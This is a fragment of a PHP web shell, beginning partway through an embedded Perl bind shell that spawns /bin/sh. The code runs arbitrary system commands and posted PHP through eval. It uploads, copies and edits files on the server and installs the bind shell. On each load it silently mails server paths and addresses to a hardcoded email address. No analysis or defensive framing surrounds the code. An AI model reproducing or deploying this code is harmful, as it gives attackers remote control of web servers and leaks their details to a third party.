&X\";
open STDERR, \">&X\";
close X;
exec(\"/bin/sh\");
}
close X;
}
";}
function decode($buffer){
return convert_cyr_string ($buffer, 'd', 'w');
}
function execute($com)
{
if (!empty($com))
{
if(function_exists('exec'))
{
exec($com,$arr);
echo implode('
',$arr);
}
elseif(function_exists('shell_exec'))
{
echo shell_exec($com);
}
elseif(function_exists('system'))
{
echo system($com);
}
elseif(function_exists('passthru'))
{
echo passthru($com);
}
}
}
function perms($mode)
{
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
/*Íà÷èíàåòñÿ*/
/*Îïðåäåëÿåì òèï ñèñòåìû*/
$servsoft = $_SERVER['SERVER_SOFTWARE'];
if (ereg("Win32", $servsoft, $reg)){
$sertype = "winda";
}
else
{
$sertype = "other";}
echo $servsoft . " ";
chdir($dir);
echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb ";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
if (ini_get('safe_mode') <> 1){
if ($sertype == "winda"){
ob_start('decode');
echo "OS: ";
echo execute("ver") . " ";
ob_end_flush();
}
if ($sertype == "other"){
echo "id:";
echo execute("id") . " ";
echo "uname:" . execute('uname -a') . " ";
}}
else{
if ($sertype == "winda"){
echo "OS: " . php_uname() . " ";
}
if ($sertype == "other"){
echo "id:";
echo execute("id") . " ";
echo "OS:" . php_uname() . " ";
}
}
echo 'User: ' .get_current_user() . ' ';
if (ini_get("open_basedir")){
echo "open_basedir: " . ini_get("open_basedir");}
if (ini_get('safe_mode') == 1){
echo "Safe mode :(";
if (ini_get('safe_mode_include_dir')){
echo "Including from here: " . ini_get('safe_mode_include_dir'); }
if (ini_get('safe_mode_exec_dir')){
echo " Exec here: " . ini_get('safe_mode_exec_dir');
}
echo "";}
if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
{
copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
}
if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
{
$data = implode("", file($_POST['filefrom']));
$fp = fopen($_POST['fileto'], "wb");
fputs($fp, $data);
$ok = fclose($fp);
if($ok)
{
$size = filesize($_POST['fileto'])/1024;
$sizef = sprintf("%.2f", $size);
print "Download - OK. (".$sizef."êÁ) ";
}
else
{
print "Something is wrong. Download - IS NOT OK ";
}
}
if (isset($_POST['installbind'])){
if (is_dir($_POST['installpath']) == true){
chdir($_POST['installpath']);
$_POST['installpath'] = "temp.pl";}
$fp = fopen($_POST['installpath'], "w");
fwrite($fp, $bind);
fclose($fp);
exec("perl " . $_POST['installpath']);
chdir($dir);
}
@$ef = stripslashes($_POST['editfile']);
if ($ef){
$fp = fopen($ef, "r");
$filearr = file($ef);
$string = '';
$content = '';
foreach ($filearr as $string){
$string = str_replace("<" , "<" , $string);
$string = str_replace(">" , ">" , $string);
$content = $content . $string;
}
echo "Edit file: $ef ";
fclose($fp);
}
if(isset($_POST['savefile'])){
$fp = fopen($_POST['savefile'], "w");
$content = stripslashes($content);
fwrite($fp, $content);
fclose($fp);
echo "Successfully saved! ";
}
if (isset($_POST['php'])){
echo "PHP code
";
}
if(isset($_POST['phpcode'])){
echo "Results of PHP execution
";
@eval(stripslashes($_POST['phpcode']));
echo " ";
}
if ($cmd){
if($sertype == "winda"){
ob_start();
execute($cmd);
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
else{
ob_start();
echo decode(execute($cmd));
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
if (trim($buffer)){
echo "Command: $cmd
";
}
}
$arr = array();
$arr = array_merge($arr, glob("*"));
$arr = array_merge($arr, glob(".*"));
$arr = array_merge($arr, glob("*.*"));
$arr = array_unique($arr);
sort($arr);
echo "Name | Type | Size | Last access | Last change | Perms | Write | Read | ";
foreach ($arr as $filename) {
if ($filename != "." and $filename != ".."){
if (is_dir($filename) == true){
$directory = "";
$directory = $directory . "$filename | " . filetype($filename) . " | | " . date("G:i j M Y",fileatime($filename)) . " | " . date("G:i j M Y",filemtime($filename)) . " | " . perms(fileperms($filename));
if (is_writable($filename) == true){
$directory = $directory . " | Yes | ";}
else{
$directory = $directory . "No | ";
}
if (is_readable($filename) == true){
$directory = $directory . "Yes | ";}
else{
$directory = $directory . "No | ";
}
$dires = $dires . $directory;
}
if (is_file($filename) == true){
$file = "";
$file = $file . " $filename | " . filetype($filename) . " | " . filesize($filename) . " | " . date("G:i j M Y",fileatime($filename)) . " | " . date("G:i j M Y",filemtime($filename)) . " | " . perms(fileperms($filename));
if (is_writable($filename) == true){
$file = $file . " | Yes | ";}
else{
$file = $file . "No | ";
}
if (is_readable($filename) == true){
$file = $file . "Yes | ";}
else{
$file = $file . "No | ";
}
$files = $files . $file;
}
}
}
echo $dires;
echo $files;
echo "
";
echo "
";
echo "";
echo " |
|